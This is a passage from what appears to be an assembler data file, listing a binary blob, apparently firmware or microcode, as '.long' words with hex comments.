## 0xf248a93f .long 3793791410 ## 0xe220a9b2 .long 3223880111 ## 0xc02881af .long 3221490050 ## 0xc0040982 .long 4294184254 ## 0xfff40d3e .long 2657786065 ## 0x9e6a98d1 .long 3221491186 ## 0xc0040df2 .long 3221490114 ## 0xc00409c2 .long 4294184258 ## 0xfff40d42 .long 4060650362 ## 0xf2089b7a .long 4064848191 ## 0xf248a93f .long 3254888882 ## 0xc201a9b2 .long 3793781038 ## 0xe220812e .long 3223880111 ## 0xc02881af .long 3221490050 ## 0xc0040982 .long 4294184254 ## 0xfff40d3e .long 2657786043 ## 0x9e6a98bb .long 3221622258 ## 0xc0060df2 .long 3221490050 ## 0xc0040982 .long 4294184258 ## 0xfff40d42 .long 4064844644 ## 0xf2489b64 .long 4060785193 ## 0xf20aaa29 .long 4064848180 ## 0xf248a934 .long 3525748913 ## 0xd226a8b1 .long 4060633348 ## 0xf2085904 .long 4077955519 ## 0xf310a9bf .long 3500572705 ## 0xd0a68021 .long 3792722180 ## 0xe2105904 .long 4077944995 ## 0xf31080a3 .long 3792732705 ## 0xe2108221 .long 4060643507 ## 0xf20880b3 .long 4060652085 ## 0xf208a235 .long 3080691901 ## 0xb79fa0bd .long 3082780526 ## 0xb7bf7f6e .long 2353037294 ## 0x8c407fee .long 2785385506 ## 0xa6059c22 .long 151175457 ## 0x902c121 .long 155238406 ## 0x940c006 .long 42405322 ## 0x2870dca .long 218237314 ## 0xd020982 .long 721207310 ## 0x2afcc00e .long 2602303476 ## 0x9b1bfff4 .long 159518154 ## 0x9820dca .long 3263171870 ## 0xc2800d1e .long 17521388 ## 0x10b5aec .long 956350753 ## 0x3900c121 .long 2601648116 ## 0x9b11fff4 .long 1133295488 ## 0x438cb780 .long 973128704 ## 0x3a00c400 .long 1133294976 ## 0x438cb580 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 153274409 ## 0x922c829 .long 158385662 ## 0x970c5fe .long 170051625 ## 0xa22c829 .long 173065726 ## 0xa50c5fe .long 1535948576 ## 0x5b8cb720 .long 211994665 ## 0xca2c829 .long 216057342 ## 0xce0c5fe .long 2231549956 ## 0x8502c004 .long 1166849408 ## 0x458cb580 .long 1158460704 ## 0x450cb520 .long 169398385 ## 0xa18d071 .long 2722230280 ## 0xa241f008 .long 1078834464 ## 0x404db520 .long 1094563136 ## 0x413db540 .long 2365636612 ## 0x8d00c004 .long 1086174528 ## 0x40bdb540 .long 1077785920 ## 0x403db540 .long 4164525090 ## 0xf8399c22 .long 4027622021 ## 0xf010a285 .long 1962977889 ## 0x7500aa61 .long 2439299072 ## 0x9164c000 .long 2831273992 ## 0xa8c1d008 .long 168205896 ## 0xa069e48 .long 1375781376 ## 0x5200c200 .long 3490197656 ## 0xd0083098 .long 3490816193 ## 0xd011a0c1 .long 3490712888 ## 0xd0100d38 .long 4027689458 ## 0xf011a9f2 .long 4027587120 ## 0xf0101a30 .long 428124483 ## 0x1984a943 .long 2481111040 ## 0x93e2c000 .long 2265108465 ## 0x8702cff1 .long 2264977392 ## 0x8700cff0 .long 142524431 ## 0x87ec00f .long 142393358 ## 0x87cc00e .long 203079760 ## 0xc1ac050 .long 2831544361 ## 0xa8c5f029 .long 546689056 ## 0x2095d020 .long 2655870113 ## 0x9e4d5ca1 .long 3254788624 ## 0xc2002210 .long 819485216 ## 0x30d85a20 .long 1074182665 ## 0x4006ba09 .long 3221271584 ## 0xc000b420 .long 439414801 ## 0x1a30f011 .long 4294908292 ## 0xffff1984 .long 4061172196 ## 0xf21091e4 .long 4027613231 ## 0xf010802f .long 4193821249 ## 0xf9f8a241 .long 2619517597 ## 0x9c22aa9d .long 2216732173 ## 0x8420a60d .long 2656404738 ## 0x9e558502 .long 2138879327 ## 0x7f7cb55f .long 2858545168 ## 0xaa61f010 .long 2374950930 ## 0x8d8ee012 .long 3042902791 ## 0xb55f0307 .long 436764668 ## 0x1a087ffc .long 3525735690 ## 0xd226750a .long 2235586828 ## 0x8540590c .long 2151997530 ## 0x8044e05a .long 2447425539 ## 0x91e0c003 .long 2441134080 ## 0x9180c000 .long 2415968257 ## 0x9000c001 .long 2436939777 ## 0x9140c001 .long 2460008449 ## 0x92a0c001 .long 2474688513 ## 0x9380c001 .long 2445328386 ## 0x91c0c002 .long 1552725888 ## 0x5c8cb780 .long 2827082248 ## 0xa881da08 .long 1950361736 ## 0x74402888 .long 3008529770 ## 0xb352856a .long 3078636642 ## 0xb7804462 .long 2639742220 ## 0x9d57450c .long 2374557713 ## 0x8d88e011 .long 424988786 ## 0x1954d072 .long 2727997960 ## 0xa299f208 .long 2596061204 ## 0x9abcc014 .long 2447425538 ## 0x91e0c002 .long 1158461312 ## 0x450cb780 .long 2837115400 ## 0xa91af208 .long 3759251113 ## 0xe0119ea9 .long 353668488 ## 0x15148d88 .long 2595274772 ## 0x9ab0c014 .long 2422259714 ## 0x9060c002 .long 2374557713 ## 0x8d88e011 .long 694080498 ## 0x295ed3f2 .long 3222538518 ## 0xc0140916 .long 3078658527 ## 0xb78099df .long 4060628236 ## 0xf208450c .long 3221332633 ## 0xc001a299 .long 3759248064 ## 0xe01192c0 .long 3555888520 ## 0xd3f28d88 .long 152447326 ## 0x916295e .long 2580725780 ## 0x99d2c014 .long 2443231233 ## 0x91a0c001 .long 2856440328 ## 0xaa41d208 .long 2357784593 ## 0x8c88f011 .long 3490859645 ## 0xd0124a7d .long 218507982 ## 0xd062ace .long 25889030 ## 0x18b0906 .long 2579808276 ## 0x99c4c014 .long 2657787523 ## 0x9e6a9e83 .long 218235275 ## 0xd02018b .long 2579415060 ## 0x99bec014 .long 2468397056 ## 0x9320c000 .long 2856440328 ## 0xaa41d208 .long 2357784593 ## 0x8c88f011 .long 3490859645 ## 0xd0124a7d .long 218245838 ## 0xd022ace .long 25889030 ## 0x18b0906 .long 2578497556 ## 0x99b0c014 .long 2657787523 ## 0x9e6a9e83 .long 3222143371 ## 0xc00e018b .long 3222539646 ## 0xc0140d7e .long 3221264809 ## 0xc00099a9 .long 3221328000 ## 0xc0019080 .long 3080687840 ## 0xb79f90e0 .long 3222240872 ## 0xc00f7e68 .long 3222146302 ## 0xc00e0cfe .long 2655653116 ## 0x9e4a0cfc .long 2087237023 ## 0x7c68b59f .long 2137831231 ## 0x7f6cb73f .long 167956465 ## 0xa02cff1 .long 167825392 ## 0xa00cff0 .long 211468368 ## 0xc9ac050 .long 3254788632 ## 0xc2002218 .long 546593313 ## 0x20945a21 .long 843208864 ## 0x324258a0 .long 1074182692 ## 0x4006ba24 .long 2137830815 ## 0x7f6cb59f .long 3221271681 ## 0xc000b481 .long 2839802376 ## 0xa943f208 .long 2146219935 ## 0x7fecb79f .long 2149708560 ## 0x8021f310 .long 2722230792 ## 0xa241f208 .long 2121185183 ## 0x7e6eb79f .long 2129573823 ## 0x7eeeb7bf .long 2137962463 ## 0x7f6eb7df .long 2348859394 ## 0x8c00c002 .long 2786958370 ## 0xa61d9c22 .long 2231534656 ## 0x85028440 .long 4029783709 ## 0xf0319e9d .long 184724453 ## 0xb02abe5 .long 2021176671 ## 0x7878b55f .long 2130490719 ## 0x7efcb55f .long 2637853070 ## 0x9d3a718e .long 2447949825 ## 0x91e8c001 .long 1963108929 ## 0x7502aa41 .long 2475868160 ## 0x9392c000 .long 2865877016 ## 0xaad1d018 .long 2366169138 ## 0x8d08e032 .long 2365644881 ## 0x8d00e051 .long 2662440399 ## 0x9eb19dcf .long 3042936080 ## 0xb55f8510 .long 3221389180 ## 0xc0027f7c .long 3263171228 ## 0xc2800a9c .long 25909909 ## 0x18b5a95 .long 2599157748 ## 0x9aebfff4 .long 2138879839 ## 0x7f7cb75f .long 1518912128 ## 0x5a88c280 .long 2166539009 ## 0x8122c301 .long 2443231232 ## 0x91a0c000 .long 2374557745 ## 0x8d88e031 .long 84647375 ## 0x50b9dcf .long 3042936080 ## 0xb55f8510 .long 4294213500 ## 0xfff47f7c .long 3076496153 ## 0xb75f9b19 .long 184844156 ## 0xb047f7c .long 4294865294 ## 0xfffe718e .long 3080688294 ## 0xb79f92a6 .long 3226499176 ## 0xc0507868 .long 3028356254 ## 0xb4810c9e .long 3226517504 ## 0xc050c000 .long 3034713366 ## 0xb4e20d16 .long 3072311296 ## 0xb71fc000 .long 3080683244 ## 0xb79f7eec .long 3082780014 ## 0xb7bf7d6e .long 3084877294 ## 0xb7df7dee .long 3086974574 ## 0xb7ff7e6e .long 3221389038 ## 0xc0027eee .long 2619509824 ## 0x9c228c40 .long 2718300217 ## 0xa205f839 .long 2214641680 ## 0x8400c010 .long 1552725888 ## 0x5c8cb780 .long 1159509824 ## 0x451cb740 .long 2827147784 ## 0xa882da08 .long 3490818241 ## 0xd011a8c1 .long 1485319704 ## 0x58882e18 .long 142655490 ## 0x880c002 .long 3792729344 ## 0xe2107500 .long 3221258403 ## 0xc00080a3 .long 168464546 ## 0xa0a90a2 .long 2432745472 ## 0x9100c000 .long 773115921 ## 0x2e14d011 .long 168195328 ## 0xa067500 .long 172281857 ## 0xa44d001 .long 209895504 ## 0xc82c050 .long 3221271681 ## 0xc000b481 .long 167952388 ## 0xa02c004 .long 3028356276 ## 0xb4810cb4 .long 2642919424 ## 0x9d87c000 .long 1076737856 ## 0x402db740 .long 161615298 ## 0x9a20dc2 .long 218284040 ## 0xd02c008 .long 209833968 ## 0xc81cff0 .long 2605580244 ## 0x9b4dffd4 .long 172148737 ## 0xa42c801 .long 167824144 ## 0xa00cb10 .long 216711218 ## 0xceac032 .long 3221271681 ## 0xc000b481 .long 146982913 ## 0x8c2c801 .long 143179792 ## 0x888c010 .long 3022064772 ## 0xb4210c84 .long 3076571136 ## 0xb760c000 .long 2643411210 ## 0x9d8f410a .long 226611184 ## 0xd81cff0 .long 2607284212 ## 0x9b67fff4 .long 167954433 ## 0xa02c801 .long 167821322 ## 0xa00c00a .long 210419760 ## 0xc8ac030 .long 3221271681 ## 0xc000b481 .long 146980872 ## 0x8c2c008 .long 3022064772 ## 0xb4210c84 .long 3221798912 ## 0xc008c000 .long 210242050 ## 0xc880a02 .long 3221271681 ## 0xc000b481 .long 226672832 ## 0xd82c0c0 .long 3221752210 ## 0xc0080992 .long 3221753090 ## 0xc0080d02 .long 3222538498 ## 0xc0140902 .long 3221789102 ## 0xc00899ae .long 3224373762 ## 0xc0300a02 .long 3028356238 ## 0xb4810c8e .long 3222585344 ## 0xc014c000 .long 3080689711 ## 0xb79f982f .long 3222302702 ## 0xc0106fee .long 2619509792 ## 0x9c228c20 .long 2718300217 ## 0xa205f839 .long 209896528 ## 0xc82c450 .long 3028355586 ## 0xb4810a02 .long 2969681920 ## 0xb101c000 .long 3221766688 ## 0xc0084220 .long 3224373824 ## 0xc0300a40 .long 3028356238 ## 0xb4810c8e .long 3221405696 ## 0xc002c000 .long 3226482880 ## 0xc05038c0 .long 3022064770 ## 0xb4210c82 .long 3233857536 ## 0xc0c0c000 .long 160566658 ## 0x9920d82 .long 218284040 ## 0xd02c008 .long 151175176 ## 0x902c008 .long 2575548436 ## 0x9983c014 .long 167952392 ## 0xa02c008 .long 210681904 ## 0xc8ec030 .long 3221271681 ## 0xc000b481 .long 2854091256 ## 0xaa1df9f8 .long 2420162560 ## 0x9040c000 .long 3293619725 ## 0xc450a60d .long 167906442 ## 0xa020c8a .long 3221271681 ## 0xc000b481 .long 1111535877 ## 0x4240b105 .long 788324366 ## 0x2efce00e .long 1586549380 ## 0x5e90d284 .long 167954433 ## 0xa02c801 .long 3224373824 ## 0xc0300a40 .long 3028356234 ## 0xb4810c8a .long 146980864 ## 0x8c2c000 .long 3022064772 ## 0xb4210c84 .long 2000732160 ## 0x7740c000 .long 1577891776 ## 0x5e0cb7c0 .long 2481111040 ## 0x93e2c000 .long 249483313 ## 0xeded031 .long 159518186 ## 0x9820dea .long 717294850 ## 0x2ac10d02 .long 424726609 ## 0x1950d051 .long 956350753 ## 0x3900c121 .long 2564685812 ## 0x98ddfff4 .long 2848387656 ## 0xa9c6f248 .long 3263168907 ## 0xc280018b .long 444881551 ## 0x1a845a8f .long 3223428778 ## 0xc0219eaa .long 4292099328 ## 0xffd43d00 .long 4064844351 ## 0xf2489a3f .long 4077955399 ## 0xf310a947 .long 4064837675 ## 0xf248802b .long 3293618757 ## 0xc450a245 .long 167906438 ## 0xa020c86 .long 3221271681 ## 0xc000b481 .long 1109438721 ## 0x4220b101 .long 172148737 ## 0xa42c801 .long 168345616 ## 0xa08c010 .long 210157618 ## 0xc86c032 .long 3221271681 ## 0xc000b481 .long 3221358726 ## 0xc0020886 .long 3022064792 ## 0xb4210c98 .long 3074473984 ## 0xb740c000 .long 4064828428 ## 0xf2485c0c .long 4031293637 ## 0xf048a8c5 .long 3495144017 ## 0xd053aa51 .long 3229620496 ## 0xc0801910 .long 4077915298 ## 0xf3100ca2 .long 3028387873 ## 0xb4818821 .long 3080765440 ## 0xb7a0c000 .long 3221380108 ## 0xc0025c0c .long 3222539650 ## 0xc0140d82 .long 4064844079 ## 0xf248992f .long 4064848069 ## 0xf248a8c5 .long 3495143985 ## 0xd053aa31 .long 4077918480 ## 0xf3101910 .long 1879607329 ## 0x70088821 .long 2456092671 ## 0x9264ffff .long 163712390 ## 0x9c20d86 .long 3240168714 ## 0xc1210d0a .long 4292086018 ## 0xffd40902 .long 4064844298 ## 0xf2489a0a .long 3231820210 ## 0xc0a1a9b2 .long 218369282 ## 0xd040d02 .long 4292086210 ## 0xffd409c2 .long 3233847799 ## 0xc0c099f7 .long 160566658 ## 0x9920d82 .long 155323714 ## 0x9420d42 .long 2566373396 ## 0x98f7c014 .long 2129573791 ## 0x7eeeb79f .long 2137962431 ## 0x7f6eb7bf .long 2146351071 ## 0x7feeb7df .long 2619509856 ## 0x9c228c60 .long 2656937485 ## 0x9e5da60d .long 4045691200 ## 0xf1245940 .long 3555809345 ## 0xd3f15841 .long 3008376110 ## 0xb3502d2e .long 3221373986 ## 0xc0024422 .long 4027093986 ## 0xf00893e2 .long 3758140001 ## 0xe000aa61 .long 3022334492 ## 0xb4252a1c .long 3624420386 ## 0xd8084422 .long 2233641569 ## 0x8522aa61 .long 2292834832 ## 0x88a9e210 .long 303573532 ## 0x12182a1c .long 3222183587 ## 0xc00e9ea3 .long 3122334334 ## 0xba1b0a7e .long 3254796299 ## 0xc200400b .long 556290567 ## 0x21285207 .long 2457255937 ## 0x9276c001 .long 3238043225 ## 0xc1009e59 .long 285432352 ## 0x11035a20 .long 1376371200 ## 0x5209c200 .long 3254820514 ## 0xc2009ea2 .long 2660063393 ## 0x9e8d58a1 .long 212914225 ## 0xcb0d031 .long 2829242888 ## 0xa8a2d208 .long 712818702 ## 0x2a7cc00e .long 1376240128 ## 0x5207c200 .long 712818702 ## 0x2a7cc00e .long 3523753114 ## 0xd208349a .long 4027097250 ## 0xf008a0a2 .long 2661394787 ## 0x9ea1a963 .long 707711985 ## 0x2a2ed3f1 .long 2166931969 ## 0x8128c201 .long 2283926288 ## 0x8821f310 .long 4027090178 ## 0xf0088502 .long 3525878369 ## 0xd228a261 .long 2662048039 ## 0x9eaba127 .long 755093488 ## 0x2d01cff0 .long 1497454912 ## 0x59415940 .long 3222156578 ## 0xc00e3522 .long 4294192508 ## 0xfff42d7c .long 3221265329 ## 0xc0009bb1 .long 3523777248 ## 0xd20892e0 .long 2657004065 ## 0x9e5eaa21 .long 1356333067 ## 0x50d8000b .long 3492360770 ## 0xd0293242 .long 4027097605 ## 0xf008a205 .long 3490949345 ## 0xd013a8e1 .long 4061145374 ## 0xf210291e .long 1964015657 ## 0x75108029 .long 10001988 ## 0x989e44 .long 2699161608 ## 0xa0e1f008 .long 1143386960 ## 0x4426b350 .long 2129573791 ## 0x7eeeb79f .long 2137962431 ## 0x7f6eb7bf .long 2146351071 ## 0x7feeb7df .long 2619509856 ## 0x9c228c60 .long 109422093 ## 0x685a60d .long 2661195369 ## 0x9e9e9e69 .long 1904347906 ## 0x71820b02 .long 3221228166 ## 0xc0000a86 .long 2661913096 ## 0x9ea99208 .long 2657687250 ## 0x9e6916d2 .long 1518649984 ## 0x5a84c280 .long 441634833 ## 0x1a52d011 .long 3490803970 ## 0xd0117102 .long 3555789026 ## 0xd3f108e2 .long 4294912798 ## 0xffff2b1e .long 3490812550 ## 0xd0119286 .long 1963985506 ## 0x75100a62 .long 3221226125 ## 0xc000028d .long 2658374100 ## 0x9e7391d4 .long 153226498 ## 0x9220d02 .long 2607874036 ## 0x9b70fff4 .long 3490781856 ## 0xd0111aa0 .long 1963985490 ## 0x75100a52 .long 4294942339 ## 0xffff9e83 .long 2658374354 ## 0x9e7392d2 .long 3490778374 ## 0xd0110d06 .long 3222145362 ## 0xc00e0952 .long 4294191484 ## 0xfff4297c .long 1972411233 ## 0x75909b61 .long 3221266051 ## 0xc0009e83 .long 3492909812 ## 0xd03192f4 .long 3555793504 ## 0xd3f11a60 .long 2657889102 ## 0x9e6c2b4e .long 3254820467 ## 0xc2009e73 .long 3555873433 ## 0xd3f25299 .long 153233758 ## 0x922295e .long 2605776884 ## 0x9b50fff4 .long 3254820483 ## 0xc2009e83 .long 2661896888 ## 0x9ea952b8 .long 382891408 ## 0x16d27590 .long 2444427263 ## 0x91b2ffff .long 3555892851 ## 0xd3f29e73 .long 17640798 ## 0x10d2d5e .long 2604859380 ## 0x9b42fff4 .long 2129573791 ## 0x7eeeb79f .long 2137962431 ## 0x7f6eb7bf .long 2146351071 ## 0x7feeb7df .long 2619509856 ## 0x9c228c60 .long 211873809 ## 0xca0f011 .long 3499794073 ## 0xd09a9e99 .long 3490535940 ## 0xd00d5a04 .long 3221232194 ## 0xc0001a42 .long 302223514 ## 0x1203909a .long 2655720002 ## 0x9e4b1242 .long 4294745762 ## 0xfffc9ea2 .long 3221328736 ## 0xc0019360 .long 4164522912 ## 0xf83993a0 .long 227189253 ## 0xd8aa205 .long 2553659412 ## 0x9835c014 .long 3222539662 ## 0xc0140d8e .long 227186738 ## 0xd8a9832 .long 2854091256 ## 0xaa1df9f8 .long 2443231233 ## 0x91a0c001 .long 2656175367 ## 0x9e520507 .long 226672832 ## 0xd82c0c0 .long 3221227922 ## 0xc0000992 .long 2656866368 ## 0x9e5c9040 .long 3517186502 ## 0xd1a401c6 .long 142760073 ## 0x8825889 .long 1015071744 ## 0x3c80c400 .long 3221271585 ## 0xc000b421 .long 1109438724 ## 0x4220b104 .long 2656248388 ## 0x9e532244 .long 4294930694 ## 0xffff7106 .long 2619511588 ## 0x9c229324 .long 3221271651 ## 0xc000b463 .long 4161969186 ## 0xf8129c22 .long 2619514978 ## 0x9c22a062 .long 226542080 ## 0xd80c200 .long 2656656777 ## 0x9e595d89 .long 3288336770 ## 0xc4000982 .long 3026402688 ## 0xb4633d80 .long 2986590208 ## 0xb203c000 .long 476704 ## 0x74620 .long 3240598562 ## 0xc1279c22 .long 2619513999 ## 0x9c229c8f .long 3111192586 ## 0xb971080a .long 3222755057 ## 0xc01756f1 .long 3228671105 ## 0xc0719c81 .long 3222772864 ## 0xc0179c80 .long 3110116480 ## 0xb9609c80 .long 2619490304 ## 0x9c224000 .long 2220926493 ## 0x8460a61d .long 1157936960 ## 0x4504b740 .long 3040807042 ## 0xb53f0882 .long 3038805868 ## 0xb5207f6c .long 4026550152 ## 0xf0004788 .long 2653792833 ## 0x9e2daa41 .long 1519171488 ## 0x5a8cb7a0 .long 2121053503 ## 0x7e6cb53f .long 1510523392 ## 0x5a08c200 .long 155242643 ## 0x940d093 .long 3760234153 ## 0xe0209ea9 .long 230861165 ## 0xdc2a96d .long 3221358990 ## 0xc002098e .long 4292087106 ## 0xffd40d42 .long 3072366880 ## 0xb7209920 .long 4060633620 ## 0xf2085a14 .long 142780965 ## 0x882aa25 .long 2129442111 ## 0x7eecb53f .long 2829709832 ## 0xa8a9f208 .long 3657997999 ## 0xda089eaf .long 3045108025 ## 0xb580a939 .long 3657974477 ## 0xda0842cd .long 3076565310 ## 0xb760a93e .long 3038796812 ## 0xb5205c0c .long 3040887757 ## 0xb54043cd .long 3040887629 ## 0xb540434d .long 4060628053 ## 0xf2084455 .long 3658000953 ## 0xda08aa39 .long 4031293858 ## 0xf048a9a2 .long 3507661159 ## 0xd112a967 .long 2655848760 ## 0x9e4d0938 .long 2831276048 ## 0xa8c1d810 .long 1962945056 ## 0x75002a20 .long 4031290972 ## 0xf0489e5c .long 1623370109 ## 0x60c2a97d .long 1518321792 ## 0x5a7fc080 .long 1517404672 ## 0x5a71c200 .long 1486028952 ## 0x58930098 .long 3792722068 ## 0xe2105894 .long 3040903331 ## 0xb54080a3 .long 3040888525 ## 0xb54046cd .long 3038791501 ## 0xb520474d .long 3221243853 ## 0xc00047cd .long 3783299458 ## 0xe1809182 .long 3221249472 ## 0xc0005dc0 .long 4031287940 ## 0xf0489284 .long 3624970615 ## 0xd810a977 .long 3221269057 ## 0xc000aa41 .long 3074461952 ## 0xb7409100 .long 3624950788 ## 0xd8105c04 .long 4030769729 ## 0xf040aa41 .long 4077955415 ## 0xf310a957 .long 4069031969 ## 0xf2888021 .long 4069040427 ## 0xf288a12b .long 4060652069 ## 0xf208a225 .long 3076565561 ## 0xb760aa39 .long 4064828444 ## 0xf2485c1c .long 4064848033 ## 0xf248a8a1 .long 2858525225 ## 0xaa61a229 .long 2842274022 ## 0xa969a8e6 .long 2696016456 ## 0xa0b1f248 .long 4060650855 ## 0xf2089d67 .long 4060652065 ## 0xf208a221 .long 4060651690 ## 0xf208a0aa .long 3629687085 ## 0xd858a12d .long 3629689066 ## 0xd858a8ea .long 3507595629 ## 0xd111a96d .long 3657959960 ## 0xda080a18 .long 4060653697 ## 0xf208a881 .long 3072368806 ## 0xb720a0a6 .long 4060634644 ## 0xf2085e14 .long 1489019185 ## 0x58c0a131 .long 4069021905 ## 0xf28858d1 .long 3658522805 ## 0xda10a0b5 .long 3074468449 ## 0xb740aa61 .long 3074441821 ## 0xb740425d .long 8995525 ## 0x8942c5 .long 1512096256 ## 0x5a20c200 .long 4077934748 ## 0xf310589c .long 3792732193 ## 0xe2108021 .long 2725085859 ## 0xa26d82a3 .long 2700210200 ## 0xa0f1f018 .long 2720395848 ## 0xa225f248 .long 2695754312 ## 0xa0adf248 .long 167821324 ## 0xa00c00c .long 1317844352 ## 0x4e8cb580 .long 142655494 ## 0x880c006 .long 1326232864 ## 0x4f0cb520 .long 217236526 ## 0xcf2c42e .long 3028355586 ## 0xb4810a02 .long 2969681920 ## 0xb101c000 .long 679756320 ## 0x28844220 .long 3221255232 ## 0xc0007440 .long 3074462082 ## 0xb7409182 .long 3507575820 ## 0xd1115c0c .long 3657959976 ## 0xda080a28 .long 3227035777 ## 0xc058a881 .long 3223745632 ## 0xc0267460 .long 3658518898 ## 0xda109172 .long 3072371297 ## 0xb720aa61 .long 2265334026 ## 0x8706410a .long 2647946496 ## 0x9dd47500 .long 517132290 ## 0x1ed2d002 .long 3042931784 ## 0xb55f7448 .long 3221257700 ## 0xc0007de4 .long 4061171986 ## 0xf2109112 .long 3489573497 ## 0xcffeaa79 .long 4061145661 ## 0xf2102a3d .long 4061176441 ## 0xf210a279 .long 708881017 ## 0x2a40aa79 .long 3221255424 ## 0xc0007500 .long 168464674 ## 0xa0a9122 .long 212779104 ## 0xcaec060 .long 3221271681 ## 0xc000b481 .long 2430648320 ## 0x90e0c000 .long 3227519494 ## 0xc0600a06 .long 3028356270 ## 0xb4810cae .long 3072376832 ## 0xb720c000 .long 4073213204 ## 0xf2c84d14 .long 4069042721 ## 0xf288aa21 .long 3355551933 ## 0xc801a8bd .long 2636004480 ## 0x9d1e3c80 .long 1158461248 ## 0x450cb740 .long 1514193408 ## 0x5a40c200 .long 3271645344 ## 0xc30158a0 .long 843199046 ## 0x32423246 .long 2723278856 ## 0xa251f008 .long 2574303284 ## 0x9970c034 .long 3224635966 ## 0xc0340a3e .long 3028356254 ## 0xb4810c9e .long 142786560 ## 0x882c000 .long 3022064784 ## 0xb4210c90 .long 4292132864 ## 0xffd4c000 .long 3221658258 ## 0xc0069a92 .long 3040904514 ## 0xb5408542 .long 167921308 ## 0xa02469c .long 210419760 ## 0xc8ac030 .long 3221271681 ## 0xc000b481 .long 142786562 ## 0x882c002 .long 3022064772 ## 0xb4210c84 .long 3355557888 ## 0xc801c000 .long 3221359106 ## 0xc0020a02 .long 478415360 ## 0x1c840a00 .long 3221271681 ## 0xc000b481 .long 151175617 ## 0x902c1c1 .long 155238406 ## 0x940c006 .long 159518158 ## 0x9820dce .long 4289989890 ## 0xffb40d02 .long 3233848234 ## 0xc0c09baa .long 4292087170 ## 0xffd40d82 .long 3078658584 ## 0xb7809a18 .long 3224651404 ## 0xc034468c .long 3254783150 ## 0xc2000cae .long 3028376081 ## 0xb4815a11 .long 142786560 ## 0x882c000 .long 3022064892 ## 0xb4210cfc .long 4061184000 ## 0xf210c000 .long 704948857 ## 0x2a04aa79 .long 2232055040 ## 0x850a7500 .long 1193063744 ## 0x471cb540 .long 2426585088 ## 0x90a2c000 .long 3040904452 ## 0xb5408504 .long 3078637340 ## 0xb780471c .long 3225306892 ## 0xc03e470c .long 3045067906 ## 0xb5800c82 .long 3028371340 ## 0xb481478c .long 3234381824 ## 0xc0c8c000 .long 3226470530 ## 0xc0500882 .long 3022064866 ## 0xb4210ce2 .long 3235954688 ## 0xc0e0c000 .long 3224898106 ## 0xc0380a3a .long 3028356346 ## 0xb4810cfa .long 4061184000 ## 0xf210c000 .long 3072371321 ## 0xb720aa79 .long 2266908428 ## 0x871e470c .long 2237841540 ## 0x8562c084 .long 1226618176 ## 0x491cb540 .long 3226470666 ## 0xc050090a .long 704908470 ## 0x2a040cb6 .long 953185536 ## 0x38d07500 .long 1192015136 ## 0x470cb520 .long 167952390 ## 0xa02c006 .long 2401820673 ## 0x8f28e001 .long 1208268096 ## 0x4804b540 .long 3221271681 ## 0xc000b481 .long 218284090 ## 0xd02c03a .long 3221271618 ## 0xc000b442 .long 3224635582 ## 0xc03408be .long 3022064798 ## 0xb4210c9e .long 3078995968 ## 0xb785c000 .long 1962957320 ## 0x75005a08 .long 2424487936 ## 0x9082c000 .long 2562900052 ## 0x98c2c054 .long 1225570176 ## 0x490cb780 .long 209895480 ## 0xc82c038 .long 3221271681 ## 0xc000b481 .long 2842024464 ## 0xa965da10 .long 2855662216 ## 0xaa35f288 .long 1586280224 ## 0x5e8cb720 .long 1648723202 ## 0x62458502 .long 1177401120 ## 0x462db720 .long 1100657984 ## 0x419ab540 .long 1109046592 ## 0x421ab540 .long 1117435200 ## 0x429ab540 .long 3254809664 ## 0xc2007440 .long 3045087761 ## 0xb5805a11 .long 3221242634 ## 0xc000430a .long 4065366274 ## 0xf2509102 .long 3076565482 ## 0xb760a9ea .long 2659992330 ## 0x9e8c430a .long 3084950626 ## 0xb7e09c62 .long 184704012 ## 0xb025c0c .long 3078659758 ## 0xb7809eae .long 3226486796 ## 0xc050480c .long 3028356226 ## 0xb4810c82 .long 3224420352 ## 0xc030c000 .long 3032616202 ## 0xb4c20d0a .long 3222192128 ## 0xc00ec000 .long 3224373502 ## 0xc03008fe .long 3022064782 ## 0xb4210c8e .long 4061184000 ## 0xf210c000 .long 704948857 ## 0x2a04aa79 .long 3221255424 ## 0xc0007500 .long 3292041602 ## 0xc4389182 .long 3032550538 ## 0xb4c10c8a .long 2969878528 ## 0xb104c000 .long 3225305632 ## 0xc03e4220 .long 3028356262 ## 0xb4810ca6 .long 3078668288 ## 0xb780c000 .long 1962951436 ## 0x7500430c .long 2476916737 ## 0x93a2c001 .long 704692256 ## 0x2a00c020 .long 3221320960 ## 0xc0017500 .long 3294662882 ## 0xc46090e2 .long 3032550562 ## 0xb4c10ca2 .long 2969878528 ## 0xb104c000 .long 143278624 ## 0x88a4220 .long 211992672 ## 0xca2c060 .long 3221271585 ## 0xc000b421 .long 151175172 ## 0x902c004 .long 211206192 ## 0xc96c030 .long 3221271617 ## 0xc000b441 .long 1124906880 ## 0x430cb780 .long 712888286 ## 0x2a7dcfde .long 1124906368 ## 0x430cb580 .long 150519810 ## 0x8f8c002 .long 216842254 ## 0xcecc00e .long 3221271585 ## 0xc000b421 .long 167952897 ## 0xa02c201 .long 3221271681 ## 0xc000b481 .long 2231549956 ## 0x8502c004 .long 1302115648 ## 0x4d9cb540 .long 1124906784 ## 0x430cb720 .long 211206192 ## 0xc96c030 .long 3221271585 ## 0xc000b421 .long 1124906880 ## 0x430cb780 .long 1962945028 ## 0x75002a04 .long 2430779392 ## 0x90e2c000 .long 1217181568 ## 0x488cb780 .long 3045067268 ## 0xb5800a04 .long 3076475020 ## 0xb75f488c .long 3078651388 ## 0xb7807dfc .long 2639217420 ## 0x9d4f430c .long 3045066123 ## 0xb580058b .long 3224653964 ## 0xc034508c .long 3078658585 ## 0xb7809a19 .long 3223339916 ## 0xc020438c .long 1962945024 ## 0x75002a00 .long 679264270 ## 0x287cc00e .long 2104276255 ## 0x7d6cb51f .long 2420293634 ## 0x9042c002 .long 2848387664 ## 0xa9c6f250 .long 218284065 ## 0xd02c021 .long 3222277500 ## 0xc0100d7c .long 4289988994 ## 0xffb40982 .long 4065368737 ## 0xf2509aa1 .long 3223431630 ## 0xc021a9ce .long 222039298 ## 0xd3c0d02 .long 159563784 ## 0x982c008 .long 2593718196 ## 0x9a98ffb4 .long 1133295488 ## 0x438cb780 .long 704693249 ## 0x2a00c401 .long 3221255424 ## 0xc0007500 .long 4060648034 ## 0xf2089262 .long 4060654189 ## 0xf208aa6d .long 151431409 ## 0x906a8f1 .long 2121053535 ## 0x7e6cb55f .long 167821328 ## 0xa00c010 .long 2725114376 ## 0xa26df208 .long 142655496 ## 0x880c008 .long 2700210696 ## 0xa0f1f208 .long 2445328384 